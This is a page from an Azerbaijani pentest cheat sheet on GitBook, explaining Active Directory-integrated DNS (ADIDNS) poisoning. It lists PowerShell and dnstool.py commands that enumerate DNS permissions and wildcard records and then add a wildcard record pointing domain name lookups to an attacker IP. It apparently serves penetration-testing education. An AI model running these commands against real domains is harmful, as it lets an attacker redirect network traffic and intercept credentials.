Pentest və SOC Cheat Sheet
  • Reconnaissance
  • Post-Explotation
    • Linux Post-Explotation
      • Linux Local Enumeration
      • Linux Privilege Escalation
      • Dumping and cracking hashes on Linux
      • Linux Persistence
    • Windows Post-Explotation
      • Windows Local Enumeration
      • Windows Privilege Escalation
      • Windows Persistence
  • Network Services Pentesting
    • 21-Pentesting FTP
    • 22-Pentesting SSH
    • 23-Pentesting Telnet
    • 53-Pentesting DNS
    • 25,465,587-Pentesting SMTP
    • 110,995-Pentesting POP
    • 139,445-Pentesting SMB
    • 3306-Pentesting MySQL
    • 3389-Pentesting RDP
    • 1433-Pentesting MSSQL-Microsoft SQL Server
    • 389,636,3268,3269-Pentesting LDAP
  • Web Pentesting
    • Broken Access Control
      • Praktiki nümunə
    • OS Command Injection
      • Praktiki nümunə
    • SQL Injection
      • Praktiki nümunə
    • Cross-Site-Scripting (XSS)
      • Praktiki nümunə
    • File Upload
      • Praktiki nümunə
    • Directory Traversal və Path Traversal
      • Praktiki nümunə
    • CSRF
    • XXE
    • Clickjacking
      • Praktiki nümunə
    • SSRF
      • Praktiki nümunə
    • JWT (Json Web Token)
      • Praktiki nümunə
    • Local&Remote File İnclusion
      • Praktiki nümunə
      • Local File inclusion ilə reverse shell almaq
    • 401&403 Bypass
    • Login Bypass
    • Open Redirect
    • Unicode Injection
    • Security Misconfiguration
    • CRLF injection
    • LDAP Injection
    • Cookies Hacking
    • Cross site WebSocket hijacking (CSWSH)
    • SSTI (Server Side Template Injection)
    • CSTI (Client Side Template Injection)
    • XSLT Server Side Injection (Extensible Stylesheet Languaje Transformations)
    • Registration & Takeover Vulnerabilities
    • Regular expression Denial of Service - ReDoS
    • Reset/Forgotten Password Bypass
    • SAML Hücumları
    • Reverse Tab Nabbing
    • Web Tool - WFuzz
    • XPATH enjeksiyonu
    • Server-Side Includes (SSI) Injection
    • Edge Side Inclusion Injection (ESII)
    • Race Condition
    • PostMessage
    • Parameter Pollution
    • Cache Poisoning and Cache Deception
    • Captcha Bypass
  • AD Pentesting
    • Domain Enumeration
      • PowerView ilə enumeration
      • AD Module ilə enumeration
      • BloodHound ilə enumeration
        • On Site BloodHound
      • Using Adalanche
        • Remote adalanche
      • Useful Enumeration Tools
    • Local Privilege Escalation
      • Useful Local Priv Esc Tools
      • UAC Bypass
    • Lateral Movement
      • Powershell Remoting
      • Mimikatz
      • Remote Desktop Protocol
      • URL File Attacks
      • Useful Tools
    • Domain Privilege Escalation
      • Kerberoast
      • ASREPRoast
      • Password Spray Attack
      • Force Set SPN
      • Abusing Shadow Copies
      • List and Decrypt Stored Credentials using Mimikatz
      • Unconstrained Delegation
      • Constrained Delegation
      • Resource Based Constrained Delegation
      • DNSAdmins Abuse
      • Abusing Active Directory-Integraded DNS (ADIDNS) poisoning
      • Abusing Backup Operators Group
      • SID History Abuse
      • Active Directory Certificate Services
    • Domain Persistence
      • Golden Ticket Attack
      • Silver Ticket Attack
      • Skeleton Key Attack
      • DSRM Abuse
      • DCsync Attack
    • Cross Forest Attacks
      • Trust Tickets
      • Abuse MSSQL Servers
      • Breaking Forest Trusts
  • SOC - Cheat Sheet
    • SOC Nədir?
    • SOC Komponentləri Nələrdir?
    • SOC Checklist
    • SIEM
      • Splunk Qurulması və Konfiqurasiyası
    • IDS/IPS
    • Firewall
    • Firewall qurulması və konfiqurasiyası
    • EDR/XDR
    • SOAR
    • Windows Commands for SOC analysts
      • GUI Programs in Windows
      • Event Viewer
      • Task Scheduler
      • Group Policy Editor
      • Device Manager
      • Task Manager
      • Registry Manager
    • Linux Commands for SOC analysts
    • LOLBAS Apps and Commands
      • Apps and Commands
Powered by GitBook
On this page
  • ADIDNS nədir?
  • ADİDNS poisoning nədir?
  • WINS forward lookup
  • ADIDNS icazələrini yoxlanılması
  • Wildcard qeydlərinin yoxlanılması
  • Windcart qeydinin yaradılası

Was this helpful?

  1. AD Pentesting
  2. Domain Privilege Escalation

Abusing Active Directory-Integraded DNS (ADIDNS) poisoning

Abusing Active Directory-Integraded DNS

PreviousDNSAdmins AbuseNextAbusing Backup Operators Group

Last updated 1 year ago

Was this helpful?

ADIDNS nədir?

Active Directory Integrated DNS (ADIDNS) Active Directory (AD) mühitində istifadə edilən və AD infrastrukturuna inteqrasiya olunmuş DNS xidmətidir. Bu, DNS xidmətini Active Directory-nin bir hissəsi kimi təqdim edir və AD-nin üstünlüklərini DNS xidmətinə inteqrasiya edir.

ADİDNS poisoning nədir?

ADIDNS zəhərlənməsi Active Directory Integrated DNS (ADIDNS) istifadə edərək həyata keçirilən DNS zəhərlənməsi hücumunun bir növüdür. Bu hücum DNS qeydlərini manipulyasiya etməklə və yalan məlumat yaymaqla həyata keçirilir.

Bu tip hücumda təcavüzkarlar adətən DNS serverlərinə və ya Active Directory inteqrasiya edilmiş DNS sisteminə daxil olur və bu sistemdəki qeydləri dəyişdirir və ya saxta qeydlər əlavə edirlər. Bu, istifadəçiləri çaşdırmaq və ya şəbəkə trafikini təcavüzkar tərəfindən idarə olunan serverlərə yönləndirmək üçün edilə bilər.

Bir çox sistemdən eyni LLMNR/NBNS sorğusunu aşkar etsəniz, uyğun qeyd ADIDNS-ə əlavə edilə bilər. Sistemlər artıq DNS-də olmayan köhnə hostlar üçün LLMNR/NBNS sorğuları göndərdikdə bu effektiv ola bilər. Əgər alt şəbəkə daxilində bir neçə sistem xüsusi adları həll etməyə çalışırsa, kənar sistemlər də cəhd edə bilər. Bu ssenaridə ADIDNS-ə inyeksiya etmək hücumun alt şəbəkə sərhədindən kənara çıxmasına kömək edəcək.

WINS forward lookup

WINS irəli axtarış vəziyyəti (Python) ilə sadalana bilər. 65281 giriş növü (yəni "WINS") WINS irəli axtarışı aktivləşdirildikdə mövcud olacaq.

dnstool.py -u 'DOMAIN\USER' -p 'PASSWORD' --record '@' --action 'query' <DC IP>

dnstool.py -u 'DOMAIN\USER' -p 'PASSWORD' --record '@' --action 'query' <DC IP> | grep "WINS\|65281"

ADIDNS icazələrini yoxlanılması

Defolt olaraq autentifikasiya edilmiş istifadəçilər CreateChild icazələrinə malikdirlər.

Get-ADIDNSPermission

Get-ADIDNSPermission | Where-Object -Property IdentityReference -EQ S-1-5-11 | Where-Object -Property ActiveDirectoryRights -EQ CreateChild

Wildcard qeydlərinin yoxlanılması

DNS serveri zonada olan qeydlərə açıq şəkildə uyğun gəlməyən ad sorğularına cavab vermək üçün “wildcard” qeydindən istifadə edəcək. Mövcud olmadıqda xəta verir.

Get-ADIDNSNodeAttribute -Node * -Attribute DNSRecord

Get-ADIDNSNodeAttribute -Node * -Attribute DNSRecord -Partition System
Get-ADIDNSNodeAttribute -Node * -Attribute DNSRecord -Partition ForestDNSZones
dnstool.py -u 'DOMAIN\USER' -p 'PASSWORD' --record '*' --action 'query' <DC IP>
dnstool.py -u 'DOMAIN\USER' -p 'PASSWORD' --record '*' --action 'query' <DC IP> --legacy
dnstool.py -u 'DOMAIN\USER' -p 'PASSWORD' --record '*' --action 'query' <DC IP> --forest
dnstool.py -u 'DOMAIN\USER' -p 'PASSWORD' --record '*' --action 'query' <DC IP> --partition

Windcart qeydinin yaradılası

Varsayılan olaraq, saytlar arasında təkrarlama üç saata qədər çəkə bilər.

Təsdiqlənmiş hər hansı bir istifadəçi qovşaq modifikasiyalarını həyata keçirə bilməsi üçün

-Tombstone istifadə edin

New-ADIDNSNode -Node * -Data <ATTACKER IP> -Verbose

New-ADIDNSNode -Node * -Data <ATTACKER IP> -Verbose -Tombstone

dnstool.py -u 'DOMAIN\USER' -p 'PASSWORD' --record '*' --action add --data <ATTACKER IP> <DC IP>
dnstool.py